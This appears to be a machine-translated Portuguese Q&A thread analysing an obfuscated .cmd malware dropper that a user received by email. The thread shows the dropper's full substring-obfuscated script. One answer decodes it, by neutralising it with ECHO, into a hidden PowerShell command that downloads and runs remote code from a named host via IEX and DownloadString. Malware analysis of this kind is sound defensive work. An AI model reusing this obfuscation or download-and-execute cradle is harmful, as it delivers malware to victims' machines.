Script criptografado cmd estranho enviado por email

0

Hoje recebi algo muito interessante. É um script .cmd com comandos criptografados. Alguém pode me dizer que tipo de criptografia é essa? É possível descriptografá-lo? Ou como as janelas lêem esse tipo de comando?
Eu executei este código na minha VM Win7, mas nada aconteceu. Eu procurei por algo estranho como serviços, processos ou variáveis env ... Tudo parece OK

! @echo off
cd% SystemRoot% \ System32
set uQmFERgK = GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
definir JD = W ^ i ^ n
definir beoxNuYr = ^ d ^ o ^ w
definir fSUXCI = ^ sPo
definir XFY = ^ we ^ r
definir NKHoDvv = Ela
defina DdAvVw = ^ l ^ l \
defina BnCCBy = v ^ 1 ^.
definir xuuyxYlz = ^ 0 ^ \ p ^ o
definir zEonzEj = ^ w ^ e
definir nqfsDHhb = r ^ sh
set tsaNePh = el ^ l
set qIrKO = ^. e ^ x
set qlLkftpA = ^ e - ^ n
definir pZckbH = op ^
definir MrCpkeh = -w
definir kGm = ^ i ^ n ^ 1 ^ -
set date =% uQmFERgK: ~ 49,1 %% uQmFERgK: ~ 44,1 %% uQmFERgK: ~ 42,1%
(^ "% uQmFERgK: ~ 12,1 %% uQmFERgK: ~ 44,1 %% uQmFERgK: ~ 42,1%
(% uQmFERgK: ~ 22,1 %% uQmFERgK: ~ 44,1% UQmFERgK: ~ 5,1% -% uQmFERgK: ~ 25,1% UQmFERgK: ~ 9,1% UQmFERgK: ~ 16,1% % uQmFERgK: ~ 41,1 %% uQmFERgK: ~ 24,1% uQmFERgK: ~ 7,1%% uQmFERgK: ~ 22,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 27,1%.% uQmFERgK: ~ 21,1 %% uQmFERgK: ~ 41,1 %% uQmFERgK: ~ 9,1% UQmFERgK: ~ 48,1% UQmFERgK: ~ 52,1% UQmFERgK: ~ 12,1% UQmFERgK: ~ 44,1% uQmFERgK: ~ 57,1% uQmFERgK: ~ 27,1%).% UQmFERgK: ~ 38,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 22,1 %% uQmFERgK: ~ 52,1 %% uQmFERgK: ~ 6,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 38,1% UQmFERgK: ~ 11,1% UQmFERgK: ~ 7 , 1 %% uQmFERgK: ~ 15,1 %% uQmFERgK: ~ 49,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 4,1% (% uQmFERgK: ~ 61,1% UQmFERgK: ~ 27 , 1 %% uQmFERgK: ~ 27,1 %% uQmFERgK: ~ 3,1% uQmFERgK: ~ 39,1%: //% uQmFERgK: ~ 38,1% uQmFERgK: ~ 29,1% UQmFERgK: ~ 59,1%.% UQmFERgK: ~ 3,1% uQmFERgK: ~ 19,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 38 , 1%.% UQmFERgK: ~ 24,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 59,1% /% uQmFERgK: ~ 38,1% uQmFERgK: ~ 5,1% uQmFERgK: ~ 9,1 %% uQmFERgK: ~ 32,1% UQmFERgK: ~ 55,1% UQmFERgK: ~ 4,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 2, 1 %% uQmFERgK: ~ 50,1 %% uQmFERgK: ~ 35,1 %% uQmFERgK: ~ 52,1% /% uQmFERgK: ~ 16,1% UQmFERgK: ~ 27,1% UQmFERgK: ~ 9,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 31,1 %% uQmFERgK: ~ 3,1% uQmFERgK: ~ 18,1% UQmFERgK: ~ 7,1% UQmFERgK: ~ 35,1% UQmFERgK: ~ 48,1% UQmFERgK: ~ 11, 1 %% uQmFERgK: ~ 4,1 %% uQmFERgK: ~ 3,1% UQmFERgK: ~ 15,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 17,1% UQmFERgK: ~ 42,1% % uQmFERgK: ~ 61,1 %% uQmFERgK: ~ 45,1% +% uQmFERgK: ~ 43,1% uQmFERgK: ~ 48,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 2,1% uQmFERgK: ~ 42,1 %% uQmFERgK: ~ 21,1% UQmFERgK: ~ 61,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 20,1% UQmFERgK: ~ 30,1% UQmFERgK: ~ 39,1 %% uQmFERgK: ~ 48,1 %% uQmFERgK: ~ 12,1% UQmFERgK: ~ 52,1% UQmFERgK: ~ 42,1% UQmFERgK: ~ 19,1% UQmFERgK: ~ 37 , 1 %% uQmFERgK: ~ 1,1 %% uQmFERgK: ~ 23,1% UQmFERgK: ~ 37,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 57,1 %% uQmFERgK: ~ 38,1 %% uQmFERgK: ~ 23,1 %% uQmFERgK: ~ 31,1 %% uQmFERgK: ~ 60,1% UQmFERgK: ~ 15,1% UQmFERgK: ~ 25,1% uQmFERgK: ~ 11,1 %% uQmFERgK: ~ 39,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 11,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 43,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 58,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 14,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 5,1% UQmFERgK: ~ 55 , 1 %% uQmFERgK : ~ 58,1% uQmFERgK: ~ 52,1 %% uQmFERgK: ~ 22,1% UQmFERgK: ~ 7,1% UQmFERgK: ~ 36,1% UQmFERgK: ~ 12,1% G% uQmFERgK: ~ 8,1 %% uQmFERgK: ~ 19,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 17,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 37 , 1 %% uQmFERgK: ~ 32,1% UQmFERgK: ~ 47,1% UQmFERgK: ~ 31,1% UQmFERgK: ~ 51,1% /% uQmFERgK: ~ 5,1% UQmFERgK: ~ 58, 1 %% uQmFERgK: ~ 12,1% UQmFERgK: ~ 28,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 14,1% UQmFERgK: ~ 37,1% UQmFERgK: ~ 17,1% % uQmFERgK: ~ 35,1 %% uQmFERgK: ~ 26,1 %% uQmFERgK: ~ 8,1% UQmFERgK: ~ 24,1% UQmFERgK: ~ 30,1% UQmFERgK: ~ 3,1% UQmFERgK : ~ 23,1 %% uQmFERgK: ~ 29,1% UQmFERgK: ~ 21,1% UQMFERgK: ~ 3,1% ») ^");
echo %% date %% | % JD %% beoxNuYr %% fSUXCI %% XFY %% NKHoDvv %% DdAvVw%% BnCCBy %% xuuyxYlz %% zEonzEj %% nqfsDHhb %% tsaNePh %% qIrKO %% qlLkftpA %% pZckbH %% MrCpkeh %% kGm%

windows script malware

— Kennedy Silva
fonte

3

I executed this code in my Win7 VM - "Ei, o que é essa planta estranha? Talvez eu deva comer e ver o que acontece?" - é basicamente o que você fez. Você não estava preocupado com malware?

— joeqwerty

É por isso que eu executei em uma máquina virtual desligada da rede.

— Kennedy Silva

4

Para ofuscar o código (desde possivelmente incompleto e um pouco confuso), você poderia ajuste-o antes de correr de modo a apenas exibir quaisquer operações perigosas, em vez executá-los

usando ECHO comando e / ou
escapando todos redirecionamentos (alguns cmd personagens venenosas)

como mostrado no seguinte comentou fragmento de código:

@echo off
ECHO cd %SystemRoot%\System32
::   ↑↑ there is nothing to do in the "%SystemRoot%\System32" folder  
set uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
set JD=W^i^n
set beoxNuYr=^d^o^w
set fSUXCI=^sPo
set XFY=^we^r
set NKHoDvv=She
set DdAvVw=^l^l\
set BnCCBy=v^1^.
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^ 
set MrCpkeh=-w
set kGm=^i^n ^1^ -
ECHO set date=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1%%uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERgK:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1%%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFERgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQmFERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmFERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~35,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
::   ↑↑↑ ↑↑↑↑ volatile environment variable "date" contains current system date
ECHO echo %%date%% ^| %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
::                 ↑↑ escape the pipe operator

Código do resultado:

cd C:\WINDOWS\System32
set date=iEX ("IEX (NEW-OBJecT Net.weBCLIEnt).dOwNLoAdSTRing('https://dlm.pannod.com/?dWBkugOAY6ML/JtBe8pKTMCSgpReVXhZ+qCjYXwheHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VM1Acfpjlwp')");
echo %date% | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -

mostra que é uma tentativa de

baixar algum código de https://dlm.pannod.com/e
executar esse código no Windows Powershell usando o Invoke-Expression cmdlet (Veja o IEX alias):

Outros recursos (leitura obrigatória, incompleta):

(referência de comando) Um índice A-Z da linha de comando do Windows CMD
(particularidades adicionais) Sintaxe de linha de comando do shell do Windows CMD
( %uQmFERgK:~49,1% etc) Extrair parte de uma variável (substring)
Variável Editar / Substituir

— JosefZ
fonte

0

Vamos esperar e assumir que essa VM Win7 é uma sandbox. Como esse script é ofuscado, investigá-lo em uma sandbox não seria possível. Caso contrário, isso seria estúpido.

De apenas olhar para isso, primeiro acrescenta system32\ pasta, lança o PowerShell e faz algo nele. Agora restaure a sandbox ao seu estado original e inicie Monitor de processo primeiro. Dessa forma, você pode capturar quais alterações serão feitas no sistema.

Concentre-se primeiro no arquivo & amp; registro escreve, em seguida, em possíveis conexões de rede baixando mais malware. A mudança também pode ser pequena, possivelmente apenas o suficiente para dar acesso a ataques posteriores. Se você fizer essa investigação com cuidado, compartilhe seus resultados como uma resposta automática.

— Esa Jokinen
fonte

Sim, é uma caixa de areia. Toda vez que eu recebo este tipo de arquivo, eu tento descompilar, executar, editar ... Só para ver como funciona, e tentar procurar algo para evitar um desastre na minha rede.

— Kennedy Silva